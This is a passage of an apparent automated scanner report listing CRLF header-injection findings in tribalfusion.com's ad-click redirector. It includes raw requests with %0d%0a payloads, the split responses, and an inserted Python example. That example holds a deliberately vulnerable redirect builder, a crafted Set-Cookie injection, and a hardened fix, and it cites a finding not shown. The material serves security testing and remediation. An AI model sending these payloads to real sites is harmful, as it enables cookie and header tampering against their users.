User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:39:51 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=655ab
1d53ab93dd7

Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.35. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 10 is copied into the Location response header. The payload da34d%0d%0ab1265b79bf1 was submitted in REST URL parameter 10. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/da34d%0d%0ab1265b79bf1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aanFkjx2eNrpE0UkbavNMSSSQpRoMvASy8X3GJ4XhBRZcUgGD3MVcFVRdE4xUQSg6gfI2a8VEZcH5gck1pFJMoroqUgULWVwBf0JsbkEU1jaDYwZcx9PgB4schU1Zbk5ZdZbsM2GG0m8KIk5567gsSBNeMZbUghQ0YjgZcoPgCI2gPunanNHI2OxXBJhEZcOUxQ4ZaBfm95ZdpCS2CpZbKvTVJWo5uMZajJ8iBMw5K6upK50DImU2rItRXhOBPZbQlDpBJyjvy5loBtvZdCAxd1BE3kLunkFOY1x2wgYCqbVhApNJZaHU7khxxwnrgGIWju4ZcQFZcnOZcGZcMHwqCqgrJPXBfDT6on99VxUxRB2yGX1AjlOVY4hBKm6n6X8I92UABhwrDhoy0r62GtYfOrGyoJMCV8gvf67HCZaNhqShkcZbyxr3YBQFlCeNRKPadZbIpSf1MnLX7ReGoCYrZbcm2xqRaxdyA7xSPst7Za0fk5fKZdSfxt8mVRV688LZbllgQt2HfapgHKUOLEHBRhBTJIZbw2NX89yO1osZbwscUfSWNdblGdosM5ZbiphnxvGrqGpBq8nQgXbPDPbXgBLXDnq51OEDB2Q2L; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:42:48 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/da34d
b1265b79bf1
/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.36. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 11 is copied into the Location response header. The payload 845ac%0d%0a5c1762bceb0 was submitted in REST URL parameter 11. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/845ac%0d%0a5c1762bceb0/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:03 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/845ac
5c1762bceb0
/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.37. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 12]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 12 is copied into the Location response header. The payload d803e%0d%0a85430c945da was submitted in REST URL parameter 12. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/d803e%0d%0a85430c945da/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:16 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/d803e
85430c945da
/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>
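Worked example (added here; it is not part of the crawler report and not code from tribalfusion.com). Findings 3.25 to 3.37 above all show one defect: a path segment or query value from the request is URL-decoded and spliced into the Location header unchanged, so %0d%0a becomes a real line break and the second half of the scanner's payload starts a header line of its own. The Python below simulates that behaviour with a deliberately vulnerable redirect builder, applies the check the scanner applies (does the marker begin a header line?), shows what an attacker-chosen header such as Set-Cookie looks like in the same position, and gives a hardened builder that refuses control characters and re-encodes the decoded value. The function names, the simulated handler logic and the Set-Cookie payload are assumptions made for illustration; the marker payload is the one from finding 3.27 and the target prefix is the one in that finding's Location header.

```python
"""CWE-113 response-header (CRLF) injection in a click-tracking redirect.

Added example for this report; it is not code from the scanner or from the
scanned site. The handler behaviour (URL-decode, then splice into Location)
is inferred from findings 3.25 to 3.37 and is an assumption; every name
below is invented for illustration.
"""
import re
from urllib.parse import quote, unquote

CRLF = "\r\n"
BODY = "<h1>Error 302 Moved Temporarily</h1>"          # body shown in the report
TARGET_PREFIX = "http:/pixel.quantserve.com/"          # prefix shown in finding 3.27
CONTROL = re.compile(r"[\x00-\x1f\x7f]")               # CR, LF and every other control char


def build_response(location: str) -> bytes:
    """Serialise a 302 whose Location header value is exactly `location`.
    No validation here: this is the layer the vulnerable handler relies on."""
    head = CRLF.join([
        "HTTP/1.1 302 Moved Temporarily",
        "Content-Type: text/html",
        f"Location: {location}",
        f"Content-Length: {len(BODY)}",
        "Connection: Close",
    ])
    return (head + CRLF + CRLF + BODY).encode("utf-8")


def vulnerable_redirect(raw_segment: str) -> bytes:
    """Simulates the scanned endpoint (assumption): the caller's path segment
    is decoded and placed in Location verbatim, so %0d%0a becomes a header
    line break. Deliberately vulnerable; do not copy."""
    return build_response(TARGET_PREFIX + unquote(raw_segment))


def hardened_redirect(raw_segment: str) -> bytes:
    """Same redirect, fixed. A Location value is a URL, and a control
    character inside it is never legitimate, so refuse the request (a 400
    in practice) rather than stripping bytes, then re-encode whatever was
    decoded so the header holds only printable URL characters."""
    decoded = unquote(raw_segment)
    if CONTROL.search(decoded):
        raise ValueError("control character in redirect target")
    return build_response(TARGET_PREFIX + quote(decoded, safe="/;=&?:@"))


def is_rejected(raw_segment: str) -> bool:
    """True when hardened_redirect refuses the segment."""
    try:
        hardened_redirect(raw_segment)
    except ValueError:
        return True
    return False


def header_lines(raw: bytes) -> list[str]:
    """Header lines of a raw response, status line excluded, split the way a
    client splits them: at each CRLF, stopping at the first blank line."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    return head.decode("utf-8", errors="replace").split(CRLF)[1:]


def injected_header(raw: bytes, marker: str) -> bool:
    """The scanner's check: does `marker` begin a header line of its own?
    In a safe response the marker only ever appears inside the Location
    value, after 'Location: ', never at column 0."""
    return any(line.startswith(marker) for line in header_lines(raw))


if __name__ == "__main__":
    probe = "8b8e4%0d%0ae7010146c86"                   # payload from finding 3.27
    for line in header_lines(vulnerable_redirect(probe)):
        print(repr(line))
    print("marker on its own line:", injected_header(vulnerable_redirect(probe), "e7010146c86"))
    # What the same defect gives an attacker: a header of their choosing.
    # Constructed illustration, not a request taken from the report.
    evil = "x%0d%0aSet-Cookie:%20ANON_ID=attacker;%20domain=.tribalfusion.com"
    print("attacker Set-Cookie emitted:", injected_header(vulnerable_redirect(evil), "Set-Cookie:"))
    print("hardened rejects probe:", is_rejected(probe))
```

Run as a script to see the vulnerable response split exactly as the report's Location headers are split, with e7010146c86 as a stand-alone header line. The hardened builder refuses instead of sanitising because a redirect target containing CR or LF has no legitimate reading; stripping would leave the ambiguous case of a value that had been encoded twice. The same check belongs in whatever layer writes headers, independent of the application code, since findings 3.28 to 3.34 show that every query parameter reaching this redirector is affected, not just the path segments.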

3.38. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 13]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 13 is copied into the Location response header. The payload 1e26f%0d%0a98d0c7685b was submitted in the REST URL parameter 13. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/1e26f%0d%0a98d0c7685b/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aCnFciO5nPuBPRokUUrOvKVAnOUHaTCPu54jkhQg4Zdv4XjIWPMVt7Za1qyQnUqkGWOMZahIDRsgV2eNZbmmjGmtMcNsGiJGVAcwsPq64IYujFJuRwu8jAcNcWaqHLgZapPUhaFdff7gIcwUoJTr7QxH0AiDg2j3Zac1wm0XZag0cxCFStF2hn1A7HNyvrrgM3ZdFYqBLfNC9pacvCrt88V9WHseTW8XjH0hK8MQRJUSqeTxAxYquIRmTkXZbHOLXnnqi91VSW6CnTn9XXgP25mVkrZcU0OFOvvZcpPZdGCmwqKtMD7YZcrQ7ujI20juZde1Me7q7BeRZae4tEAOyTuW1d4hZaPynnCU24eKJ1KLqbBE3mZae8FD42GDGZbMQOZcfP6DpJljn5rRZb0unxhUrZbHCYC5P9YZb3Qr5nqBiMme5SqnF42eOGjpZbgry4cfjlZdHsjoZbOQG1ggXQGaEZc9paan19WeZd8ntA03ww6cn2XOZbrqhfFE1rXFZdZb7tIQT1LDwroLnCrSBFdeNF3ZdqSFdhITLyZaa4ZcHFZcXWwWMtxZcA5fB0dGZcGRZaHZackaaoOOUZahuVnPl6YfV4w7xRLg7lRXHvpGa2a; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:36 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/1e26f
98d0c7685b
/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.39. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 14]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 14 is copied into the Location response header. The payload 2c6a9%0d%0a7020e2fed79 was submitted in the REST URL parameter 14. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/2c6a9%0d%0a7020e2fed79/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=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;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:43:41 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/2c6a9
7020e2fed79
/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.40. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 15]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 15 is copied into the Location response header. The payload 52493%0d%0a224473ccc99 was submitted in the REST URL parameter 15. This caused a response containing an injected HTTP header.

Request

GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/52493%0d%0a224473ccc99/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=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; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:44:14 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/52493
224473ccc99
/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

3.41. http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366 [REST URL parameter 16]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The value of REST URL parameter 16 is copied into the Location response header. The payload 2b2bd%0d%0ad6cedd4809c was submitted in the REST URL parameter 16. This caused a response containing an injected HTTP header.

Request

